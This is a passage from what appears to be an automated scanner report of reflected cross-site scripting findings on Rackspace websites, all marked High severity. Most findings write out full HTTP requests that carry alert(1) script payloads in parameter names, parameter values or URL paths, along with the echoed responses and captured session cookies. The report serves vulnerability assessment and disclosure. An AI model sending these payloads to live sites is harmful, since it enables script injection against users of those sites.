GET /whyrackspace/network/index.php?601d9"><script>alert(1)</script>dd3b2933cd2=1 HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol ...[SNIP]... onclick="track_chat_button('Green Chat Tab');window.open('https://admin.instantservice.com/Customer?ai=7513&di=39941&email=a@a.com&optionaldata2=http://www.rackspace.com/whyrackspace/network/index.php?601d9"><script>alert(1)</script>dd3b2933cd2=1&optionaldata3=cleanEntry&optionaldata4=US4da9da571af9d6d58e6c524219e4d7f8&optionaldata5=2f0f5a423706ce3acae18c89','custclient','width=500,height=320');return false;"> ...[SNIP]...
4.191. http://www.rackspace.com/whyrackspace/support/fanati/index.php [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.rackspace.com
Path:
/whyrackspace/support/fanati/index.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8f7b8"><script>alert(1)</script>be21f72e6fc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /whyrackspace/support/fanati/index.php?8f7b8"><script>alert(1)</script>be21f72e6fc=1 HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-3-30_4--3+6--3_42442-1---1296919161_4-6_4-6; _vis_opt_test_cookie=1; __utma=47003812.1362301340.1296919297.1296919297.1296919297.1; __utmc=47003812; exp_last_activity=1296938631; __utmb=47003812.4.10.1296919297; s_pv=rackspaceUS%3Ainformation%3Aindex.php; rsea_cust=1; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=2; __utmz=47003812.1296919297.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; keyword=cleanentry; s_sq=rackspacecom%2Crackspaceglobalrackspace%3D%2526pid%253DrackspaceUS%25253Aforms%25253Acontactsales.php%2526pidt%253D1%2526oid%253Dfunctiononclick%252528event%252529%25257BgetURL%252528%252527/information/index.php%252527%252529%25257D%2526oidt%253D2%2526ot%253DH3%26rackmailtrust%3D%2526pid%253Dappssite%252520-%252520Apps%252520Home%2526pidt%253D1%2526oid%253Dhttp%25253A//www.rackspace.com/apps/fanatical_support/_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps%23; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296920713_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A19%3A%22%2Ffanatical_support%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol ...[SNIP]... onclick="track_chat_button('Green Chat Tab');window.open('https://admin.instantservice.com/Customer?ai=7513&di=39941&email=a@a.com&optionaldata2=http://www.rackspace.com/information/events/fanati.php?8f7b8"><script>alert(1)</script>be21f72e6fc=1&optionaldata3=cleanEntry&optionaldata4=US4da9da571af9d6d58e6c524219e4d7f8&optionaldata5=http://www.google.com/search?hl=en&q=2f0f5a4242353bda923acdd2','custclient','width=500,height=320');return fal ...[SNIP]...
4.192. http://www.rackspace.com/whyrackspace/support/index.php [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.rackspace.com
Path:
/whyrackspace/support/index.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 381a9"><script>alert(1)</script>b80af3942be was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /whyrackspace/support/index.php?381a9"><script>alert(1)</script>b80af3942be=1 HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol ...[SNIP]... onclick="track_chat_button('Green Chat Tab');window.open('https://admin.instantservice.com/Customer?ai=7513&di=39941&email=a@a.com&optionaldata2=http://www.rackspace.com/whyrackspace/support/index.php?381a9"><script>alert(1)</script>b80af3942be=1&optionaldata3=cleanEntry&optionaldata4=US4da9da571af9d6d58e6c524219e4d7f8&optionaldata5=2f0f5a42e06467fc5ccee756','custclient','width=500,height=320');return false;"> ...[SNIP]...
4.193. http://www.rackspacecloud.com/aboutus/contact/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.rackspacecloud.com
Path:
/aboutus/contact/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4eab9"><script>alert(1)</script>0c9c0306586 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /aboutus/contact/?4eab9"><script>alert(1)</script>0c9c0306586=1 HTTP/1.1 Host: www.rackspacecloud.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US1ffb86d7e6309d5032693db6bb0255e1; __utmz=6088624.1296919128.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sq=%5B%5BB%5D%5D; _mkto_trk=id:045-QRG-025&token:_mch-rackspacecloud.com-1296919127768-13820; chatslidercookie=invitesent; IS_UASrackuid=US1ffb86d7e6309d5032693db6bb0255e1; _MyGoogleTracker=(direct); s_cc=true; IS3_History=1296860233-7-2_4--7+6--7_42456-1---1296919229_4-6_4-6; IS3_GSV=DPL-2_TES-1296919127_PCT-1296920684_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; PHPSESSID=1ffb86d7e6309d5032693db6bb0255e1; chatslider=D; __utma=6088624.618527023.1296919128.1296919128.1296919128.1; __utmc=6088624; __utmb=6088624.10.10.1296919128;
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 16:09:27 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Vary: Accept-Encoding Content-Length: 39207
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" dir="ltr">
4.194. http://www.rackspacecloud.com/aboutus/events/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.rackspacecloud.com
Path:
/aboutus/events/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e032b"><script>alert(1)</script>4339acd2d66 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /aboutus/events/?e032b"><script>alert(1)</script>4339acd2d66=1 HTTP/1.1 Host: www.rackspacecloud.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US1ffb86d7e6309d5032693db6bb0255e1; __utmz=6088624.1296919128.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sq=%5B%5BB%5D%5D; _mkto_trk=id:045-QRG-025&token:_mch-rackspacecloud.com-1296919127768-13820; chatslidercookie=invitesent; IS_UASrackuid=US1ffb86d7e6309d5032693db6bb0255e1; _MyGoogleTracker=(direct); s_cc=true; IS3_History=1296860233-7-2_4--7+6--7_42456-1---1296919229_4-6_4-6; IS3_GSV=DPL-2_TES-1296919127_PCT-1296920684_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; PHPSESSID=1ffb86d7e6309d5032693db6bb0255e1; chatslider=D; __utma=6088624.618527023.1296919128.1296919128.1296919128.1; __utmc=6088624; __utmb=6088624.10.10.1296919128;
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 16:09:25 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Vary: Accept-Encoding Content-Length: 44013
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" dir="ltr">
4.195. http://www.rackspacecloud.com/aboutus/story/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.rackspacecloud.com
Path:
/aboutus/story/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e8540"><script>alert(1)</script>995d02061e0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /aboutus/story/?e8540"><script>alert(1)</script>995d02061e0=1 HTTP/1.1 Host: www.rackspacecloud.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US1ffb86d7e6309d5032693db6bb0255e1; __utmz=6088624.1296919128.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sq=%5B%5BB%5D%5D; _mkto_trk=id:045-QRG-025&token:_mch-rackspacecloud.com-1296919127768-13820; chatslidercookie=invitesent; IS_UASrackuid=US1ffb86d7e6309d5032693db6bb0255e1; _MyGoogleTracker=(direct); s_cc=true; IS3_History=1296860233-7-2_4--7+6--7_42456-1---1296919229_4-6_4-6; IS3_GSV=DPL-2_TES-1296919127_PCT-1296920684_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; PHPSESSID=1ffb86d7e6309d5032693db6bb0255e1; chatslider=D; __utma=6088624.618527023.1296919128.1296919128.1296919128.1; __utmc=6088624; __utmb=6088624.10.10.1296919128;
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 16:09:22 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Vary: Accept-Encoding Content-Length: 38522
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" dir="ltr">
4.196. http://www.rackspacecloud.com/blog/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.rackspacecloud.com
Path:
/blog/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f7b08"><script>alert(1)</script>ee23580c6a6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as f7b08\"><script>alert(1)</script>ee23580c6a6 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /blog/?f7b08"><script>alert(1)</script>ee23580c6a6=1 HTTP/1.1 Host: www.rackspacecloud.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US1ffb86d7e6309d5032693db6bb0255e1; __utmz=6088624.1296919128.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sq=%5B%5BB%5D%5D; _mkto_trk=id:045-QRG-025&token:_mch-rackspacecloud.com-1296919127768-13820; chatslidercookie=invitesent; IS_UASrackuid=US1ffb86d7e6309d5032693db6bb0255e1; _MyGoogleTracker=(direct); s_cc=true; IS3_History=1296860233-7-2_4--7+6--7_42456-1---1296919229_4-6_4-6; IS3_GSV=DPL-2_TES-1296919127_PCT-1296920684_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; PHPSESSID=1ffb86d7e6309d5032693db6bb0255e1; chatslider=D; __utma=6088624.618527023.1296919128.1296919128.1296919128.1; __utmc=6088624; __utmb=6088624.10.10.1296919128;
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d270e"><script>alert(1)</script>6558ea7b56c was submitted in the REST URL parameter 5. This input was echoed as d270e\"><script>alert(1)</script>6558ea7b56c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /blog/2010/12/14/rackspace-will-take-care-of-your-cloud-while-you-manage-your-businessd270e"><script>alert(1)</script>6558ea7b56c/ HTTP/1.1 Host: www.rackspacecloud.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US1ffb86d7e6309d5032693db6bb0255e1; __utmz=6088624.1296919128.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sq=%5B%5BB%5D%5D; _mkto_trk=id:045-QRG-025&token:_mch-rackspacecloud.com-1296919127768-13820; chatslidercookie=invitesent; IS_UASrackuid=US1ffb86d7e6309d5032693db6bb0255e1; _MyGoogleTracker=(direct); s_cc=true; IS3_History=1296860233-7-2_4--7+6--7_42456-1---1296919229_4-6_4-6; IS3_GSV=DPL-2_TES-1296919127_PCT-1296920684_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; PHPSESSID=1ffb86d7e6309d5032693db6bb0255e1; chatslider=D; __utma=6088624.618527023.1296919128.1296919128.1296919128.1; __utmc=6088624; __utmb=6088624.10.10.1296919128;
Response
HTTP/1.1 404 Not Found Date: Sat, 05 Feb 2011 16:10:00 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 X-Pingback: http://www.rackspacecloud.com/blog/xmlrpc.php Expires: Thu, 19 Nov 1981 08:52:00 GMT Last-Modified: Sat, 05 Feb 2011 16:10:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Vary: Accept-Encoding Content-Length: 41047
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" dir="ltr">
<head>
<ti ...[SNIP]... ttps://admin.instantservice.com/Customer?ai=7513&di=39941&email=a@a.com&optionaldata2=http://www.rackspacecloud.com/blog/2010/12/14/rackspace-will-take-care-of-your-cloud-while-you-manage-your-businessd270e\"><script>alert(1)</script>6558ea7b56c/&optionaldata3=loginpg&optionaldata4=US1ffb86d7e6309d5032693db6bb0255e1&optionaldata5=http://www.google.com/search?hl=en&q=3eeeb%2522%253bdda4ec24089','custclient','width=500,height=320');return f ...[SNIP]...
4.198. http://www.rackspacecloud.com/blog/2010/12/14/rackspace-will-take-care-of-your-cloud-while-you-manage-your-business/ [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2d48b"><script>alert(1)</script>c0b9320fbda was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 2d48b\"><script>alert(1)</script>c0b9320fbda in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /blog/2010/12/14/rackspace-will-take-care-of-your-cloud-while-you-manage-your-business/?2d48b"><script>alert(1)</script>c0b9320fbda=1 HTTP/1.1 Host: www.rackspacecloud.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US1ffb86d7e6309d5032693db6bb0255e1; __utmz=6088624.1296919128.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sq=%5B%5BB%5D%5D; _mkto_trk=id:045-QRG-025&token:_mch-rackspacecloud.com-1296919127768-13820; chatslidercookie=invitesent; IS_UASrackuid=US1ffb86d7e6309d5032693db6bb0255e1; _MyGoogleTracker=(direct); s_cc=true; IS3_History=1296860233-7-2_4--7+6--7_42456-1---1296919229_4-6_4-6; IS3_GSV=DPL-2_TES-1296919127_PCT-1296920684_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; PHPSESSID=1ffb86d7e6309d5032693db6bb0255e1; chatslider=D; __utma=6088624.618527023.1296919128.1296919128.1296919128.1; __utmc=6088624; __utmb=6088624.10.10.1296919128;
The value of the CMP request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8b3ef"><script>alert(1)</script>bde34b6d68b was submitted in the CMP parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /cloudU?CMP=loginpg8b3ef"><script>alert(1)</script>bde34b6d68b HTTP/1.1 Host: www.rackspacecloud.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US1ffb86d7e6309d5032693db6bb0255e1; __utmz=6088624.1296919128.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sq=%5B%5BB%5D%5D; _mkto_trk=id:045-QRG-025&token:_mch-rackspacecloud.com-1296919127768-13820; chatslidercookie=invitesent; IS_UASrackuid=US1ffb86d7e6309d5032693db6bb0255e1; _MyGoogleTracker=(direct); s_cc=true; IS3_History=1296860233-5-2_4--5+6--5_42456-1---1296919229_4-6_4-6; IS3_GSV=DPL-2_TES-1296919127_PCT-1296919127_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; PHPSESSID=1ffb86d7e6309d5032693db6bb0255e1; chatslider=D; __utma=6088624.618527023.1296919128.1296919128.1296919128.1; __utmc=6088624; __utmb=6088624.7.10.1296919128;
Response (redirected)
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 15:36:46 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Vary: Accept-Encoding Content-Length: 44403
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" dir="ltr">
4.200. http://www.rackspacecloud.com/cloudU [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.rackspacecloud.com
Path:
/cloudU
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d59c2"><script>alert(1)</script>957351c9bd8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /cloudU?d59c2"><script>alert(1)</script>957351c9bd8=1 HTTP/1.1 Host: www.rackspacecloud.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US1ffb86d7e6309d5032693db6bb0255e1; __utmz=6088624.1296919128.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sq=%5B%5BB%5D%5D; _mkto_trk=id:045-QRG-025&token:_mch-rackspacecloud.com-1296919127768-13820; chatslidercookie=invitesent; IS_UASrackuid=US1ffb86d7e6309d5032693db6bb0255e1; _MyGoogleTracker=(direct); s_cc=true; IS3_History=1296860233-5-2_4--5+6--5_42456-1---1296919229_4-6_4-6; IS3_GSV=DPL-2_TES-1296919127_PCT-1296919127_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; PHPSESSID=1ffb86d7e6309d5032693db6bb0255e1; chatslider=D; __utma=6088624.618527023.1296919128.1296919128.1296919128.1; __utmc=6088624; __utmb=6088624.7.10.1296919128;
Response (redirected)
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 15:37:04 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Vary: Accept-Encoding Content-Length: 44381
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" dir="ltr">
<head>
<ti ...[SNIP]... atinvite-wrap" onclick="track_chat_button('Green Chat Tab');window.open('https://admin.instantservice.com/Customer?ai=7513&di=39941&email=a@a.com&optionaldata2=http://www.rackspacecloud.com/cloudU/?d59c2"><script>alert(1)</script>957351c9bd8=1&optionaldata3=loginpg&optionaldata4=US1ffb86d7e6309d5032693db6bb0255e1&optionaldata5=http://www.google.com/search?hl=en&q=4e7adeacdad626b79a66169b','custclient','width=500,height=320');return fa ...[SNIP]...
4.201. http://www.rackspacecloud.com/cloudU/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.rackspacecloud.com
Path:
/cloudU/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload de6d9"><script>alert(1)</script>2088ea59228 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /cloudU/?de6d9"><script>alert(1)</script>2088ea59228=1 HTTP/1.1 Host: www.rackspacecloud.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US1ffb86d7e6309d5032693db6bb0255e1; __utmz=6088624.1296919128.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sq=%5B%5BB%5D%5D; _mkto_trk=id:045-QRG-025&token:_mch-rackspacecloud.com-1296919127768-13820; chatslidercookie=invitesent; IS_UASrackuid=US1ffb86d7e6309d5032693db6bb0255e1; _MyGoogleTracker=(direct); s_cc=true; IS3_History=1296860233-7-2_4--7+6--7_42456-1---1296919229_4-6_4-6; IS3_GSV=DPL-2_TES-1296919127_PCT-1296920684_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; PHPSESSID=1ffb86d7e6309d5032693db6bb0255e1; chatslider=D; __utma=6088624.618527023.1296919128.1296919128.1296919128.1; __utmc=6088624; __utmb=6088624.10.10.1296919128;
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 16:09:24 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Vary: Accept-Encoding Content-Length: 44382
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" dir="ltr">
<head>
<ti ...[SNIP]... atinvite-wrap" onclick="track_chat_button('Green Chat Tab');window.open('https://admin.instantservice.com/Customer?ai=7513&di=39941&email=a@a.com&optionaldata2=http://www.rackspacecloud.com/cloudU/?de6d9"><script>alert(1)</script>2088ea59228=1&optionaldata3=loginpg&optionaldata4=US1ffb86d7e6309d5032693db6bb0255e1&optionaldata5=http://www.google.com/search?hl=en&q=4e7adeacdad626b79a66169b','custclient','width=500,height=320');return fa ...[SNIP]...
4.202. http://www.rackspacecloud.com/cloud_hosting_demos [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.rackspacecloud.com
Path:
/cloud_hosting_demos
Issue detail
